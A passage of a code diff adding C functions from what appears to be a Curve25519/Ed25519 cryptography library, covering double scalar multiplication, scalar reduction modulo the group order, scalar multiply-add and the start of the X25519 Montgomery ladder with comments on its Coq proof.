a[0]+256*a[1]+...+256^31 a[31]. +// and b = b[0]+256*b[1]+...+256^31 b[31]. +// B is the Ed25519 base point (x,4/5) with x positive. +static void ge_double_scalarmult_vartime(ge_p2 *r, const uint8_t *a, + const ge_p3 *A, const uint8_t *b) { + signed char aslide[256]; + signed char bslide[256]; + ge_cached Ai[8]; // A,3A,5A,7A,9A,11A,13A,15A + ge_p1p1 t; + ge_p3 u; + ge_p3 A2; + int i; + slide(aslide, a); + slide(bslide, b); + x25519_ge_p3_to_cached(&Ai[0], A); + ge_p3_dbl(&t, A); + x25519_ge_p1p1_to_p3(&A2, &t); + x25519_ge_add(&t, &A2, &Ai[0]); + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_p3_to_cached(&Ai[1], &u); + x25519_ge_add(&t, &A2, &Ai[1]); + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_p3_to_cached(&Ai[2], &u); + x25519_ge_add(&t, &A2, &Ai[2]); + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_p3_to_cached(&Ai[3], &u); + x25519_ge_add(&t, &A2, &Ai[3]); + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_p3_to_cached(&Ai[4], &u); + x25519_ge_add(&t, &A2, &Ai[4]); + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_p3_to_cached(&Ai[5], &u); + x25519_ge_add(&t, &A2, &Ai[5]); + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_p3_to_cached(&Ai[6], &u); + x25519_ge_add(&t, &A2, &Ai[6]); + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_p3_to_cached(&Ai[7], &u); + ge_p2_0(r); + for (i = 255; i >= 0; --i) { + if (aslide[i] || bslide[i]) { + break; + } + } + for (; i >= 0; --i) { + ge_p2_dbl(&t, r); + if (aslide[i] > 0) { + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_add(&t, &u, &Ai[aslide[i] / 2]); + } else if (aslide[i] < 0) { + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_sub(&t, &u, &Ai[(-aslide[i]) / 2]); + } + if (bslide[i] > 0) { + x25519_ge_p1p1_to_p3(&u, &t); + ge_madd(&t, &u, &Bi[bslide[i] / 2]); + } else if (bslide[i] < 0) { + x25519_ge_p1p1_to_p3(&u, &t); + ge_msub(&t, &u, &Bi[(-bslide[i]) / 2]); + } + x25519_ge_p1p1_to_p2(r, &t); + } +} +// int64_lshift21 returns |a << 21| but is defined when shifting bits into the +// sign bit. This works around a language flaw in C. +static inline int64_t int64_lshift21(int64_t a) { + return (int64_t)((uint64_t)a << 21); +} +// The set of scalars is \Z/l +// where l = 2^252 + 27742317777372353535851937790883648493. +// Input: +// s[0]+256*s[1]+...+256^63*s[63] = s +// +// Output: +// s[0]+256*s[1]+...+256^31*s[31] = s mod l +// where l = 2^252 + 27742317777372353535851937790883648493. +// Overwrites s in place. +void x25519_sc_reduce(uint8_t s[64]) { + int64_t s0 = 2097151 & load_3(s); + int64_t s1 = 2097151 & (load_4(s + 2) >> 5); + int64_t s2 = 2097151 & (load_3(s + 5) >> 2); + int64_t s3 = 2097151 & (load_4(s + 7) >> 7); + int64_t s4 = 2097151 & (load_4(s + 10) >> 4); + int64_t s5 = 2097151 & (load_3(s + 13) >> 1); + int64_t s6 = 2097151 & (load_4(s + 15) >> 6); + int64_t s7 = 2097151 & (load_3(s + 18) >> 3); + int64_t s8 = 2097151 & load_3(s + 21); + int64_t s9 = 2097151 & (load_4(s + 23) >> 5); + int64_t s10 = 2097151 & (load_3(s + 26) >> 2); + int64_t s11 = 2097151 & (load_4(s + 28) >> 7); + int64_t s12 = 2097151 & (load_4(s + 31) >> 4); + int64_t s13 = 2097151 & (load_3(s + 34) >> 1); + int64_t s14 = 2097151 & (load_4(s + 36) >> 6); + int64_t s15 = 2097151 & (load_3(s + 39) >> 3); + int64_t s16 = 2097151 & load_3(s + 42); + int64_t s17 = 2097151 & (load_4(s + 44) >> 5); + int64_t s18 = 2097151 & (load_3(s + 47) >> 2); + int64_t s19 = 2097151 & (load_4(s + 49) >> 7); + int64_t s20 = 2097151 & (load_4(s + 52) >> 4); + int64_t s21 = 2097151 & (load_3(s + 55) >> 1); + int64_t s22 = 2097151 & (load_4(s + 57) >> 6); + int64_t s23 = (load_4(s + 60) >> 3); + int64_t carry0; + int64_t carry1; + int64_t carry2; + int64_t carry3; + int64_t carry4; + int64_t carry5; + int64_t carry6; + int64_t carry7; + int64_t carry8; + int64_t carry9; + int64_t carry10; + int64_t carry11; + int64_t carry12; + int64_t carry13; + int64_t carry14; + int64_t carry15; + int64_t carry16; + s11 += s23 * 666643; + s12 += s23 * 470296; + s13 += s23 * 654183; + s14 -= s23 * 997805; + s15 += s23 * 136657; + s16 -= s23 * 683901; + s23 = 0; + s10 += s22 * 666643; + s11 += s22 * 470296; + s12 += s22 * 654183; + s13 -= s22 * 997805; + s14 += s22 * 136657; + s15 -= s22 * 683901; + s22 = 0; + s9 += s21 * 666643; + s10 += s21 * 470296; + s11 += s21 * 654183; + s12 -= s21 * 997805; + s13 += s21 * 136657; + s14 -= s21 * 683901; + s21 = 0; + s8 += s20 * 666643; + s9 += s20 * 470296; + s10 += s20 * 654183; + s11 -= s20 * 997805; + s12 += s20 * 136657; + s13 -= s20 * 683901; + s20 = 0; + s7 += s19 * 666643; + s8 += s19 * 470296; + s9 += s19 * 654183; + s10 -= s19 * 997805; + s11 += s19 * 136657; + s12 -= s19 * 683901; + s19 = 0; + s6 += s18 * 666643; + s7 += s18 * 470296; + s8 += s18 * 654183; + s9 -= s18 * 997805; + s10 += s18 * 136657; + s11 -= s18 * 683901; + s18 = 0; + carry6 = (s6 + (1 << 20)) >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry8 = (s8 + (1 << 20)) >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry10 = (s10 + (1 << 20)) >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + carry12 = (s12 + (1 << 20)) >> 21; + s13 += carry12; + s12 -= int64_lshift21(carry12); + carry14 = (s14 + (1 << 20)) >> 21; + s15 += carry14; + s14 -= int64_lshift21(carry14); + carry16 = (s16 + (1 << 20)) >> 21; + s17 += carry16; + s16 -= int64_lshift21(carry16); + carry7 = (s7 + (1 << 20)) >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry9 = (s9 + (1 << 20)) >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry11 = (s11 + (1 << 20)) >> 21; + s12 += carry11; + s11 -= int64_lshift21(carry11); + carry13 = (s13 + (1 << 20)) >> 21; + s14 += carry13; + s13 -= int64_lshift21(carry13); + carry15 = (s15 + (1 << 20)) >> 21; + s16 += carry15; + s15 -= int64_lshift21(carry15); + s5 += s17 * 666643; + s6 += s17 * 470296; + s7 += s17 * 654183; + s8 -= s17 * 997805; + s9 += s17 * 136657; + s10 -= s17 * 683901; + s17 = 0; + s4 += s16 * 666643; + s5 += s16 * 470296; + s6 += s16 * 654183; + s7 -= s16 * 997805; + s8 += s16 * 136657; + s9 -= s16 * 683901; + s16 = 0; + s3 += s15 * 666643; + s4 += s15 * 470296; + s5 += s15 * 654183; + s6 -= s15 * 997805; + s7 += s15 * 136657; + s8 -= s15 * 683901; + s15 = 0; + s2 += s14 * 666643; + s3 += s14 * 470296; + s4 += s14 * 654183; + s5 -= s14 * 997805; + s6 += s14 * 136657; + s7 -= s14 * 683901; + s14 = 0; + s1 += s13 * 666643; + s2 += s13 * 470296; + s3 += s13 * 654183; + s4 -= s13 * 997805; + s5 += s13 * 136657; + s6 -= s13 * 683901; + s13 = 0; + s0 += s12 * 666643; + s1 += s12 * 470296; + s2 += s12 * 654183; + s3 -= s12 * 997805; + s4 += s12 * 136657; + s5 -= s12 * 683901; + s12 = 0; + carry0 = (s0 + (1 << 20)) >> 21; + s1 += carry0; + s0 -= int64_lshift21(carry0); + carry2 = (s2 + (1 << 20)) >> 21; + s3 += carry2; + s2 -= int64_lshift21(carry2); + carry4 = (s4 + (1 << 20)) >> 21; + s5 += carry4; + s4 -= int64_lshift21(carry4); + carry6 = (s6 + (1 << 20)) >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry8 = (s8 + (1 << 20)) >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry10 = (s10 + (1 << 20)) >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + carry1 = (s1 + (1 << 20)) >> 21; + s2 += carry1; + s1 -= int64_lshift21(carry1); + carry3 = (s3 + (1 << 20)) >> 21; + s4 += carry3; + s3 -= int64_lshift21(carry3); + carry5 = (s5 + (1 << 20)) >> 21; + s6 += carry5; + s5 -= int64_lshift21(carry5); + carry7 = (s7 + (1 << 20)) >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry9 = (s9 + (1 << 20)) >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry11 = (s11 + (1 << 20)) >> 21; + s12 += carry11; + s11 -= int64_lshift21(carry11); + s0 += s12 * 666643; + s1 += s12 * 470296; + s2 += s12 * 654183; + s3 -= s12 * 997805; + s4 += s12 * 136657; + s5 -= s12 * 683901; + s12 = 0; + carry0 = s0 >> 21; + s1 += carry0; + s0 -= int64_lshift21(carry0); + carry1 = s1 >> 21; + s2 += carry1; + s1 -= int64_lshift21(carry1); + carry2 = s2 >> 21; + s3 += carry2; + s2 -= int64_lshift21(carry2); + carry3 = s3 >> 21; + s4 += carry3; + s3 -= int64_lshift21(carry3); + carry4 = s4 >> 21; + s5 += carry4; + s4 -= int64_lshift21(carry4); + carry5 = s5 >> 21; + s6 += carry5; + s5 -= int64_lshift21(carry5); + carry6 = s6 >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry7 = s7 >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry8 = s8 >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry9 = s9 >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry10 = s10 >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + carry11 = s11 >> 21; + s12 += carry11; + s11 -= int64_lshift21(carry11); + s0 += s12 * 666643; + s1 += s12 * 470296; + s2 += s12 * 654183; + s3 -= s12 * 997805; + s4 += s12 * 136657; + s5 -= s12 * 683901; + s12 = 0; + carry0 = s0 >> 21; + s1 += carry0; + s0 -= int64_lshift21(carry0); + carry1 = s1 >> 21; + s2 += carry1; + s1 -= int64_lshift21(carry1); + carry2 = s2 >> 21; + s3 += carry2; + s2 -= int64_lshift21(carry2); + carry3 = s3 >> 21; + s4 += carry3; + s3 -= int64_lshift21(carry3); + carry4 = s4 >> 21; + s5 += carry4; + s4 -= int64_lshift21(carry4); + carry5 = s5 >> 21; + s6 += carry5; + s5 -= int64_lshift21(carry5); + carry6 = s6 >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry7 = s7 >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry8 = s8 >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry9 = s9 >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry10 = s10 >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + s[0] = s0 >> 0; + s[1] = s0 >> 8; + s[2] = (s0 >> 16) | (s1 << 5); + s[3] = s1 >> 3; + s[4] = s1 >> 11; + s[5] = (s1 >> 19) | (s2 << 2); + s[6] = s2 >> 6; + s[7] = (s2 >> 14) | (s3 << 7); + s[8] = s3 >> 1; + s[9] = s3 >> 9; + s[10] = (s3 >> 17) | (s4 << 4); + s[11] = s4 >> 4; + s[12] = s4 >> 12; + s[13] = (s4 >> 20) | (s5 << 1); + s[14] = s5 >> 7; + s[15] = (s5 >> 15) | (s6 << 6); + s[16] = s6 >> 2; + s[17] = s6 >> 10; + s[18] = (s6 >> 18) | (s7 << 3); + s[19] = s7 >> 5; + s[20] = s7 >> 13; + s[21] = s8 >> 0; + s[22] = s8 >> 8; + s[23] = (s8 >> 16) | (s9 << 5); + s[24] = s9 >> 3; + s[25] = s9 >> 11; + s[26] = (s9 >> 19) | (s10 << 2); + s[27] = s10 >> 6; + s[28] = (s10 >> 14) | (s11 << 7); + s[29] = s11 >> 1; + s[30] = s11 >> 9; + s[31] = s11 >> 17; +} +// Input: +// a[0]+256*a[1]+...+256^31*a[31] = a +// b[0]+256*b[1]+...+256^31*b[31] = b +// c[0]+256*c[1]+...+256^31*c[31] = c +// +// Output: +// s[0]+256*s[1]+...+256^31*s[31] = (ab+c) mod l +// where l = 2^252 + 27742317777372353535851937790883648493. +static void sc_muladd(uint8_t *s, const uint8_t *a, const uint8_t *b, + const uint8_t *c) { + int64_t a0 = 2097151 & load_3(a); + int64_t a1 = 2097151 & (load_4(a + 2) >> 5); + int64_t a2 = 2097151 & (load_3(a + 5) >> 2); + int64_t a3 = 2097151 & (load_4(a + 7) >> 7); + int64_t a4 = 2097151 & (load_4(a + 10) >> 4); + int64_t a5 = 2097151 & (load_3(a + 13) >> 1); + int64_t a6 = 2097151 & (load_4(a + 15) >> 6); + int64_t a7 = 2097151 & (load_3(a + 18) >> 3); + int64_t a8 = 2097151 & load_3(a + 21); + int64_t a9 = 2097151 & (load_4(a + 23) >> 5); + int64_t a10 = 2097151 & (load_3(a + 26) >> 2); + int64_t a11 = (load_4(a + 28) >> 7); + int64_t b0 = 2097151 & load_3(b); + int64_t b1 = 2097151 & (load_4(b + 2) >> 5); + int64_t b2 = 2097151 & (load_3(b + 5) >> 2); + int64_t b3 = 2097151 & (load_4(b + 7) >> 7); + int64_t b4 = 2097151 & (load_4(b + 10) >> 4); + int64_t b5 = 2097151 & (load_3(b + 13) >> 1); + int64_t b6 = 2097151 & (load_4(b + 15) >> 6); + int64_t b7 = 2097151 & (load_3(b + 18) >> 3); + int64_t b8 = 2097151 & load_3(b + 21); + int64_t b9 = 2097151 & (load_4(b + 23) >> 5); + int64_t b10 = 2097151 & (load_3(b + 26) >> 2); + int64_t b11 = (load_4(b + 28) >> 7); + int64_t c0 = 2097151 & load_3(c); + int64_t c1 = 2097151 & (load_4(c + 2) >> 5); + int64_t c2 = 2097151 & (load_3(c + 5) >> 2); + int64_t c3 = 2097151 & (load_4(c + 7) >> 7); + int64_t c4 = 2097151 & (load_4(c + 10) >> 4); + int64_t c5 = 2097151 & (load_3(c + 13) >> 1); + int64_t c6 = 2097151 & (load_4(c + 15) >> 6); + int64_t c7 = 2097151 & (load_3(c + 18) >> 3); + int64_t c8 = 2097151 & load_3(c + 21); + int64_t c9 = 2097151 & (load_4(c + 23) >> 5); + int64_t c10 = 2097151 & (load_3(c + 26) >> 2); + int64_t c11 = (load_4(c + 28) >> 7); + int64_t s0; + int64_t s1; + int64_t s2; + int64_t s3; + int64_t s4; + int64_t s5; + int64_t s6; + int64_t s7; + int64_t s8; + int64_t s9; + int64_t s10; + int64_t s11; + int64_t s12; + int64_t s13; + int64_t s14; + int64_t s15; + int64_t s16; + int64_t s17; + int64_t s18; + int64_t s19; + int64_t s20; + int64_t s21; + int64_t s22; + int64_t s23; + int64_t carry0; + int64_t carry1; + int64_t carry2; + int64_t carry3; + int64_t carry4; + int64_t carry5; + int64_t carry6; + int64_t carry7; + int64_t carry8; + int64_t carry9; + int64_t carry10; + int64_t carry11; + int64_t carry12; + int64_t carry13; + int64_t carry14; + int64_t carry15; + int64_t carry16; + int64_t carry17; + int64_t carry18; + int64_t carry19; + int64_t carry20; + int64_t carry21; + int64_t carry22; + s0 = c0 + a0 * b0; + s1 = c1 + a0 * b1 + a1 * b0; + s2 = c2 + a0 * b2 + a1 * b1 + a2 * b0; + s3 = c3 + a0 * b3 + a1 * b2 + a2 * b1 + a3 * b0; + s4 = c4 + a0 * b4 + a1 * b3 + a2 * b2 + a3 * b1 + a4 * b0; + s5 = c5 + a0 * b5 + a1 * b4 + a2 * b3 + a3 * b2 + a4 * b1 + a5 * b0; + s6 = c6 + a0 * b6 + a1 * b5 + a2 * b4 + a3 * b3 + a4 * b2 + a5 * b1 + a6 * b0; + s7 = c7 + a0 * b7 + a1 * b6 + a2 * b5 + a3 * b4 + a4 * b3 + a5 * b2 + + a6 * b1 + a7 * b0; + s8 = c8 + a0 * b8 + a1 * b7 + a2 * b6 + a3 * b5 + a4 * b4 + a5 * b3 + + a6 * b2 + a7 * b1 + a8 * b0; + s9 = c9 + a0 * b9 + a1 * b8 + a2 * b7 + a3 * b6 + a4 * b5 + a5 * b4 + + a6 * b3 + a7 * b2 + a8 * b1 + a9 * b0; + s10 = c10 + a0 * b10 + a1 * b9 + a2 * b8 + a3 * b7 + a4 * b6 + a5 * b5 + + a6 * b4 + a7 * b3 + a8 * b2 + a9 * b1 + a10 * b0; + s11 = c11 + a0 * b11 + a1 * b10 + a2 * b9 + a3 * b8 + a4 * b7 + a5 * b6 + + a6 * b5 + a7 * b4 + a8 * b3 + a9 * b2 + a10 * b1 + a11 * b0; + s12 = a1 * b11 + a2 * b10 + a3 * b9 + a4 * b8 + a5 * b7 + a6 * b6 + a7 * b5 + + a8 * b4 + a9 * b3 + a10 * b2 + a11 * b1; + s13 = a2 * b11 + a3 * b10 + a4 * b9 + a5 * b8 + a6 * b7 + a7 * b6 + a8 * b5 + + a9 * b4 + a10 * b3 + a11 * b2; + s14 = a3 * b11 + a4 * b10 + a5 * b9 + a6 * b8 + a7 * b7 + a8 * b6 + a9 * b5 + + a10 * b4 + a11 * b3; + s15 = a4 * b11 + a5 * b10 + a6 * b9 + a7 * b8 + a8 * b7 + a9 * b6 + a10 * b5 + + a11 * b4; + s16 = a5 * b11 + a6 * b10 + a7 * b9 + a8 * b8 + a9 * b7 + a10 * b6 + a11 * b5; + s17 = a6 * b11 + a7 * b10 + a8 * b9 + a9 * b8 + a10 * b7 + a11 * b6; + s18 = a7 * b11 + a8 * b10 + a9 * b9 + a10 * b8 + a11 * b7; + s19 = a8 * b11 + a9 * b10 + a10 * b9 + a11 * b8; + s20 = a9 * b11 + a10 * b10 + a11 * b9; + s21 = a10 * b11 + a11 * b10; + s22 = a11 * b11; + s23 = 0; + carry0 = (s0 + (1 << 20)) >> 21; + s1 += carry0; + s0 -= int64_lshift21(carry0); + carry2 = (s2 + (1 << 20)) >> 21; + s3 += carry2; + s2 -= int64_lshift21(carry2); + carry4 = (s4 + (1 << 20)) >> 21; + s5 += carry4; + s4 -= int64_lshift21(carry4); + carry6 = (s6 + (1 << 20)) >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry8 = (s8 + (1 << 20)) >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry10 = (s10 + (1 << 20)) >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + carry12 = (s12 + (1 << 20)) >> 21; + s13 += carry12; + s12 -= int64_lshift21(carry12); + carry14 = (s14 + (1 << 20)) >> 21; + s15 += carry14; + s14 -= int64_lshift21(carry14); + carry16 = (s16 + (1 << 20)) >> 21; + s17 += carry16; + s16 -= int64_lshift21(carry16); + carry18 = (s18 + (1 << 20)) >> 21; + s19 += carry18; + s18 -= int64_lshift21(carry18); + carry20 = (s20 + (1 << 20)) >> 21; + s21 += carry20; + s20 -= int64_lshift21(carry20); + carry22 = (s22 + (1 << 20)) >> 21; + s23 += carry22; + s22 -= int64_lshift21(carry22); + carry1 = (s1 + (1 << 20)) >> 21; + s2 += carry1; + s1 -= int64_lshift21(carry1); + carry3 = (s3 + (1 << 20)) >> 21; + s4 += carry3; + s3 -= int64_lshift21(carry3); + carry5 = (s5 + (1 << 20)) >> 21; + s6 += carry5; + s5 -= int64_lshift21(carry5); + carry7 = (s7 + (1 << 20)) >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry9 = (s9 + (1 << 20)) >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry11 = (s11 + (1 << 20)) >> 21; + s12 += carry11; + s11 -= int64_lshift21(carry11); + carry13 = (s13 + (1 << 20)) >> 21; + s14 += carry13; + s13 -= int64_lshift21(carry13); + carry15 = (s15 + (1 << 20)) >> 21; + s16 += carry15; + s15 -= int64_lshift21(carry15); + carry17 = (s17 + (1 << 20)) >> 21; + s18 += carry17; + s17 -= int64_lshift21(carry17); + carry19 = (s19 + (1 << 20)) >> 21; + s20 += carry19; + s19 -= int64_lshift21(carry19); + carry21 = (s21 + (1 << 20)) >> 21; + s22 += carry21; + s21 -= int64_lshift21(carry21); + s11 += s23 * 666643; + s12 += s23 * 470296; + s13 += s23 * 654183; + s14 -= s23 * 997805; + s15 += s23 * 136657; + s16 -= s23 * 683901; + s23 = 0; + s10 += s22 * 666643; + s11 += s22 * 470296; + s12 += s22 * 654183; + s13 -= s22 * 997805; + s14 += s22 * 136657; + s15 -= s22 * 683901; + s22 = 0; + s9 += s21 * 666643; + s10 += s21 * 470296; + s11 += s21 * 654183; + s12 -= s21 * 997805; + s13 += s21 * 136657; + s14 -= s21 * 683901; + s21 = 0; + s8 += s20 * 666643; + s9 += s20 * 470296; + s10 += s20 * 654183; + s11 -= s20 * 997805; + s12 += s20 * 136657; + s13 -= s20 * 683901; + s20 = 0; + s7 += s19 * 666643; + s8 += s19 * 470296; + s9 += s19 * 654183; + s10 -= s19 * 997805; + s11 += s19 * 136657; + s12 -= s19 * 683901; + s19 = 0; + s6 += s18 * 666643; + s7 += s18 * 470296; + s8 += s18 * 654183; + s9 -= s18 * 997805; + s10 += s18 * 136657; + s11 -= s18 * 683901; + s18 = 0; + carry6 = (s6 + (1 << 20)) >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry8 = (s8 + (1 << 20)) >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry10 = (s10 + (1 << 20)) >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + carry12 = (s12 + (1 << 20)) >> 21; + s13 += carry12; + s12 -= int64_lshift21(carry12); + carry14 = (s14 + (1 << 20)) >> 21; + s15 += carry14; + s14 -= int64_lshift21(carry14); + carry16 = (s16 + (1 << 20)) >> 21; + s17 += carry16; + s16 -= int64_lshift21(carry16); + carry7 = (s7 + (1 << 20)) >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry9 = (s9 + (1 << 20)) >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry11 = (s11 + (1 << 20)) >> 21; + s12 += carry11; + s11 -= int64_lshift21(carry11); + carry13 = (s13 + (1 << 20)) >> 21; + s14 += carry13; + s13 -= int64_lshift21(carry13); + carry15 = (s15 + (1 << 20)) >> 21; + s16 += carry15; + s15 -= int64_lshift21(carry15); + s5 += s17 * 666643; + s6 += s17 * 470296; + s7 += s17 * 654183; + s8 -= s17 * 997805; + s9 += s17 * 136657; + s10 -= s17 * 683901; + s17 = 0; + s4 += s16 * 666643; + s5 += s16 * 470296; + s6 += s16 * 654183; + s7 -= s16 * 997805; + s8 += s16 * 136657; + s9 -= s16 * 683901; + s16 = 0; + s3 += s15 * 666643; + s4 += s15 * 470296; + s5 += s15 * 654183; + s6 -= s15 * 997805; + s7 += s15 * 136657; + s8 -= s15 * 683901; + s15 = 0; + s2 += s14 * 666643; + s3 += s14 * 470296; + s4 += s14 * 654183; + s5 -= s14 * 997805; + s6 += s14 * 136657; + s7 -= s14 * 683901; + s14 = 0; + s1 += s13 * 666643; + s2 += s13 * 470296; + s3 += s13 * 654183; + s4 -= s13 * 997805; + s5 += s13 * 136657; + s6 -= s13 * 683901; + s13 = 0; + s0 += s12 * 666643; + s1 += s12 * 470296; + s2 += s12 * 654183; + s3 -= s12 * 997805; + s4 += s12 * 136657; + s5 -= s12 * 683901; + s12 = 0; + carry0 = (s0 + (1 << 20)) >> 21; + s1 += carry0; + s0 -= int64_lshift21(carry0); + carry2 = (s2 + (1 << 20)) >> 21; + s3 += carry2; + s2 -= int64_lshift21(carry2); + carry4 = (s4 + (1 << 20)) >> 21; + s5 += carry4; + s4 -= int64_lshift21(carry4); + carry6 = (s6 + (1 << 20)) >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry8 = (s8 + (1 << 20)) >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry10 = (s10 + (1 << 20)) >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + carry1 = (s1 + (1 << 20)) >> 21; + s2 += carry1; + s1 -= int64_lshift21(carry1); + carry3 = (s3 + (1 << 20)) >> 21; + s4 += carry3; + s3 -= int64_lshift21(carry3); + carry5 = (s5 + (1 << 20)) >> 21; + s6 += carry5; + s5 -= int64_lshift21(carry5); + carry7 = (s7 + (1 << 20)) >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry9 = (s9 + (1 << 20)) >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry11 = (s11 + (1 << 20)) >> 21; + s12 += carry11; + s11 -= int64_lshift21(carry11); + s0 += s12 * 666643; + s1 += s12 * 470296; + s2 += s12 * 654183; + s3 -= s12 * 997805; + s4 += s12 * 136657; + s5 -= s12 * 683901; + s12 = 0; + carry0 = s0 >> 21; + s1 += carry0; + s0 -= int64_lshift21(carry0); + carry1 = s1 >> 21; + s2 += carry1; + s1 -= int64_lshift21(carry1); + carry2 = s2 >> 21; + s3 += carry2; + s2 -= int64_lshift21(carry2); + carry3 = s3 >> 21; + s4 += carry3; + s3 -= int64_lshift21(carry3); + carry4 = s4 >> 21; + s5 += carry4; + s4 -= int64_lshift21(carry4); + carry5 = s5 >> 21; + s6 += carry5; + s5 -= int64_lshift21(carry5); + carry6 = s6 >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry7 = s7 >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry8 = s8 >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry9 = s9 >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry10 = s10 >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + carry11 = s11 >> 21; + s12 += carry11; + s11 -= int64_lshift21(carry11); + s0 += s12 * 666643; + s1 += s12 * 470296; + s2 += s12 * 654183; + s3 -= s12 * 997805; + s4 += s12 * 136657; + s5 -= s12 * 683901; + s12 = 0; + carry0 = s0 >> 21; + s1 += carry0; + s0 -= int64_lshift21(carry0); + carry1 = s1 >> 21; + s2 += carry1; + s1 -= int64_lshift21(carry1); + carry2 = s2 >> 21; + s3 += carry2; + s2 -= int64_lshift21(carry2); + carry3 = s3 >> 21; + s4 += carry3; + s3 -= int64_lshift21(carry3); + carry4 = s4 >> 21; + s5 += carry4; + s4 -= int64_lshift21(carry4); + carry5 = s5 >> 21; + s6 += carry5; + s5 -= int64_lshift21(carry5); + carry6 = s6 >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry7 = s7 >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry8 = s8 >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry9 = s9 >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry10 = s10 >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + s[0] = s0 >> 0; + s[1] = s0 >> 8; + s[2] = (s0 >> 16) | (s1 << 5); + s[3] = s1 >> 3; + s[4] = s1 >> 11; + s[5] = (s1 >> 19) | (s2 << 2); + s[6] = s2 >> 6; + s[7] = (s2 >> 14) | (s3 << 7); + s[8] = s3 >> 1; + s[9] = s3 >> 9; + s[10] = (s3 >> 17) | (s4 << 4); + s[11] = s4 >> 4; + s[12] = s4 >> 12; + s[13] = (s4 >> 20) | (s5 << 1); + s[14] = s5 >> 7; + s[15] = (s5 >> 15) | (s6 << 6); + s[16] = s6 >> 2; + s[17] = s6 >> 10; + s[18] = (s6 >> 18) | (s7 << 3); + s[19] = s7 >> 5; + s[20] = s7 >> 13; + s[21] = s8 >> 0; + s[22] = s8 >> 8; + s[23] = (s8 >> 16) | (s9 << 5); + s[24] = s9 >> 3; + s[25] = s9 >> 11; + s[26] = (s9 >> 19) | (s10 << 2); + s[27] = s10 >> 6; + s[28] = (s10 >> 14) | (s11 << 7); + s[29] = s11 >> 1; + s[30] = s11 >> 9; + s[31] = s11 >> 17; +} +static void x25519_scalar_mult_generic(uint8_t out[32], + const uint8_t scalar[32], + const uint8_t point[32]) { + fe x1, x2, z2, x3, z3, tmp0, tmp1; + fe_loose x2l, z2l, x3l, tmp0l, tmp1l; + uint8_t e[32]; + OPENSSL_memcpy(e, scalar, 32); + e[0] &= 248; + e[31] &= 127; + e[31] |= 64; + // The following implementation was transcribed to Coq and proven to + // correspond to unary scalar multiplication in affine coordinates given that + // x1 != 0 is the x coordinate of some point on the curve. It was also checked + // in Coq that doing a ladderstep with x1 = x3 = 0 gives z2' = z3' = 0, and z2 + // = z3 = 0 gives z2' = z3' = 0. The statement was quantified over the + // underlying field, so it applies to Curve25519 itself and the quadratic + // twist of Curve25519. It was not proven in Coq that prime-field arithmetic + // correctly simulates extension-field arithmetic on prime-field values. + // The decoding of the byte array representation of e was not considered. + // Specification of Montgomery curves in affine coordinates: + // + // Proof that these form a group that is isomorphic to a Weierstrass curve: + // + // Coq transcription and correctness proof of the loop (where scalarbits=255): + // + // + // preconditions: 0 <= e < 2^255 (not necessarily e < order), fe_invert(0) = 0 + fe_frombytes(&x1, point); + fe_1(&x2); + fe_0(&z2); + fe_copy(&x3, &x1); + fe_1(&z3); + unsigned swap = 0; + int pos; + for (pos = 254; pos >= 0; --pos) { + // loop invariant as of right before the test, for the case where x1 != 0: + // pos >= -1; if z2 = 0 then x2 is nonzero; if z3 = 0 then x3 is nonzero + // let r := e >> (pos+1) in the following equalities of projective points: + // to_xz (r*P) === if swap then (x3, z3) else 